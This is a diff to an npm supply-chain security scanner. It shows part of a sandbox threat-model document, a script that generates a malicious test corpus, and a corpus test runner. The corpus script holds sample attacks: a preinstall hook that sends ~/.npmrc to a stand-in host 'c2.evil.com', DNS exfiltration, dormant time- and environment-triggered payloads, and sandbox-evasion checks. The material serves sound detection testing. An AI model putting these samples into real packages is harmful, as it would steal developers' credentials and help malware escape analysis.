+- **Monitor mode (opt-in):** Egress allowed through a MITM proxy (HTTPBun/sink) that records all requests for post-analysis review. The malware believes it has network access; actually all traffic is captured.
+
+## Filesystem Layout
+
+```
+/tmp/analysis/{id}/
+  ├── package/          # extracted tarball (read-only bind mount)
+  ├── run.js            # runner script that executes the package
+  └── output.json       # structured findings after timeout
+```
+
+## Timeouts and Lifecycle
+
+1. Container starts → package extracted → 30s countdown begins
+2. Runner runs `npm install && node index.js` (or entry point from package.json)
+3. All syscalls logged via gVisor's `strace`-style logging
+4. On timeout (30s): SIGKILL, logs collected, findings generated
+5. Container destroyed, tmpfs unmounted
+
+## Analysis Pipeline
+
+```
+  [fetch tarball] → [verify size < 500MB] → [extract to tmpfs]
+       → [gVisor sandbox: execute entry point for 30s]
+       → [collect syscall log + file system diffs]
+       → [run ATK-008/009/010 behavioral detectors on trace]
+       → [merge static + dynamic findings]
+       → [cleanup: destroy container, unmount tmpfs]
+```
+
+## Anti-Sandbox-Evasion (ATK-010)
+
+The analyzer checks for behaviors indicating the package probes its environment:
+
+- Hostname checks (expects randomized, non-obvious hostnames)
+- `CI` env var detection (sandbox should NOT set CI-like env vars)
+- Timing attacks (`performance.now()`, `process.hrtime()`)
+- Process tree inspection (`process.ppid`, `/proc/self/status`)
+- Stack trace capture (Error().stack inspection)
+
+Detection of evasion attempts is itself a high-severity finding.
+
+## Threat Model Review Cadence
+
+| Type | Frequency | Owner |
+|------|-----------|-------|
+| Full threat model review | Every major release (quarterly) | Security lead |
+| gVisor CVE monitoring | Continuous (automated alerts) | DevOps |
+| Sandbox escape test | Every PR adding a new ATK detector | CI pipeline |
+| Penetration test | Annual (third-party) | External firm |
+
+---
+
+*This document is a living artifact. Update when: gVisor version changes, new ATK entries require dynamic analysis, or a CVSS 7+ CVE affects the isolation stack.*

package/package.json

@@ -1,6 +1,6 @@
 {
   "name": "@lateos/npm-scan",
-  "version": "0.2.5",
+  "version": "0.3.1",
   "description": "Powerful npm supply chain security scanner - detects malicious packages (Shai-Hulud style), behavioral analysis, SBOM, and compliance reporting.",
   "main": "backend/index.js",
   "bin": {
@@ -34,7 +34,7 @@
   },
   "dependencies": {
     "acorn": "^8.16.0",
-    "adm-zip": "^0.5.17",
+    "better-sqlite3": "^11.10.0",
     "commander": "^14.0.3",
     "glob": "^13.0.6",
     "node-fetch": "^3.3.2",

package/scripts/gen-mal-corpus.js

@@ -7,6 +7,14 @@ const BASE = '/tmp/npm-scan-mal';
 const MALS = [
   { name: 'shai-hulud', pkg: { scripts: { preinstall: 'curl -d @~/.npmrc https://c2.evil.com/x' } }, js: 'eval(atob("Y3VybCBodHRwOi8vYzIuZXZpbC5jb20="))' },
   { name: 'mal-dns-exfil', pkg: {}, js: 'dns.resolve(key + ".exfil.com", (err, addr) => {})' },
+  { name: 'mal-tamper-1', pkg: { name: 'lodash', repository: { url: 'https://github.com/attacker/lodash-mirror.git' } }, js: 'module.exports = { malicious: true }' },
+  { name: 'mal-tamper-2', pkg: { name: 'react', repository: { url: 'https://github.com/attacker/react-evil.git' } }, js: '// Source: https://evil.com/react/original.js\nmodule.exports = {}' },
+  { name: 'mal-dormant-1', pkg: {}, js: 'if (process.env.NODE_ENV === "production") { eval(atob("Y29uc29sZS5sb2coJ2V2aWwnKQ==")) }' },
+  { name: 'mal-dormant-2', pkg: {}, js: 'if (new Date() > new Date("2026-06-01")) { require("./payload.js") }' },
+  { name: 'mal-dormant-3', pkg: {}, js: 'if (process.env.CI) { process.exit(0) } else { /* malicious */ require("./exploit.js") }' },
+  { name: 'mal-evasion-1', pkg: {}, js: 'if (os.hostname().includes("docker") || os.hostname().includes("sandbox")) { process.exit(0) }' },
+  { name: 'mal-evasion-2', pkg: {}, js: 'if (process.argv.join(" ").includes("inspect")) { debugger; /* stop analysis */ }' },
+  { name: 'mal-evasion-3', pkg: {}, js: 'try { throw new Error(); } catch(e) { if (e.stack.includes("sandbox")) { process.exit(0) } }' },
 ];
 
 for (const mal of MALS) {
@@ -17,4 +25,8 @@ for (const mal of MALS) {
   if (mal.js) writeFileSync(join(dir, 'index.js'), mal.js);
   execSync(`tar czf tests/corpus/malicious/${mal.name}.tgz -C ${BASE} ${mal.name}`);
   console.log(`OK ${mal.name}`);
-}
+}
+
+console.log('All mal corpus entries generated.');
+console.log('Total:', MALS.length);
+console.log('New entries: tamper-1, tamper-2, dormant-1, dormant-2, dormant-3, evasion-1, evasion-2, evasion-3');

package/tests/corpus/run.js

@@ -1,4 +1,3 @@
-import assert from 'assert/strict';
 import { globSync } from 'glob';
 import { readFileSync, mkdtempSync } from 'fs';
 import { execSync } from 'child_process';
@@ -23,18 +22,22 @@ function scanLocalTarball(tarPath) {
 
 let cleanFails = 0;
 let malFails = 0;
+let cleanTotal = 0;
+let malTotal = 0;
 
 console.log('--- Clean corpus (remote) ---');
 for (const pkg of ['lodash', 'chalk', 'react', 'axios', 'express']) {
+  cleanTotal++;
   try {
     const { pkgJson, jsFiles, tmpDir } = await fetchPackage(pkg);
     const findings = await runAll(pkgJson, jsFiles);
     const bad = findings.filter(f => f.severity === 'high' || f.severity === 'critical');
+    const badIds = bad.map(f => f.id).join(', ');
     if (bad.length > 0) {
-      console.log(`  FAIL ${pkg}: ${bad.length} high/crit (${bad.map(f => f.id).join(', ')})`);
+      console.log(`  FAIL ${pkg}: ${bad.length} high/crit (${badIds})`);
       cleanFails++;
     } else {
-      console.log(`  OK   ${pkg}`);
+      console.log(`  OK   ${pkg} (no high/crit findings)`);
     }
     cleanup(tmpDir);
   } catch (e) {
@@ -45,11 +48,13 @@ for (const pkg of ['lodash', 'chalk', 'react', 'axios', 'express']) {
 
 console.log('--- Malicious corpus (local) ---');
 const malTars = globSync('tests/corpus/malicious/*.tgz');
+malTotal = malTars.length;
 for (const tar of malTars) {
   const name = path.basename(tar, '.tgz');
   try {
     const { pkgJson, jsFiles } = scanLocalTarball(tar);
     const findings = await runAll(pkgJson, jsFiles);
+    const ids = findings.map(f => f.id).join(', ');
     if (findings.length === 0) {
       console.log(`  FAIL ${name}: no findings`);
       console.log(`    scripts: ${JSON.stringify(pkgJson.scripts || {})}`);
@@ -57,7 +62,7 @@ for (const tar of malTars) {
       console.log(`    js files: ${jsFiles.length}`);
       malFails++;
     } else {
-      console.log(`  OK   ${name}: ${findings.length} findings (${findings.map(f => f.id).join(', ')})`);
+      console.log(`  OK   ${name}: ${ids}`);
     }
   } catch (e) {
     console.log(`  ERR  ${name}: ${e.message}`);
@@ -65,15 +70,24 @@ for (const tar of malTars) {
   }
 }
 
-const fpRate = (cleanFails / 5 * 100).toFixed(1);
-const malDetectRate = ((malTars.length - malFails) / malTars.length * 100).toFixed(1);
+const fpRate = cleanTotal > 0 ? (cleanFails / cleanTotal * 100).toFixed(1) : 'N/A';
+const malDetectRate = malTotal > 0 ? ((malTotal - malFails) / malTotal * 100).toFixed(1) : 'N/A';
 console.log(`\n=== Corpus Results ===`);
-console.log(`Clean FP rate: ${fpRate}% (${cleanFails}/5 high/crit)`);
-console.log(`Mal detect rate: ${malDetectRate}% (${malTars.length - malFails}/${malTars.length})`);
+console.log(`Clean packages: ${cleanTotal}, Malicious samples: ${malTotal}`);
+console.log(`Clean FP rate: ${fpRate}% (${cleanFails}/${cleanTotal} high/crit)`);
+console.log(`Mal detect rate: ${malDetectRate}% (${malTotal - malFails}/${malTotal})`);
 
-if (Number(fpRate) >= 2) {
+let exitCode = 0;
+if (fpRate !== 'N/A' && Number(fpRate) >= 2) {
   console.log(`FP <2% : FAIL (${fpRate}% exceeds 2%)`);
-  process.exit(1);
+  exitCode = 1;
+} else {
+  console.log('FP <2% : PASS');
 }
-console.log('FP <2% : PASS');
-console.log('Test corpus FP <2% PASS');
+if (malDetectRate !== 'N/A' && Number(malDetectRate) < 100) {
+  console.log(`Mal 100% : FAIL (${malDetectRate}%)`);
+  exitCode = 1;
+} else {
+  console.log('Mal 100% : PASS');
+}
+process.exit(exitCode);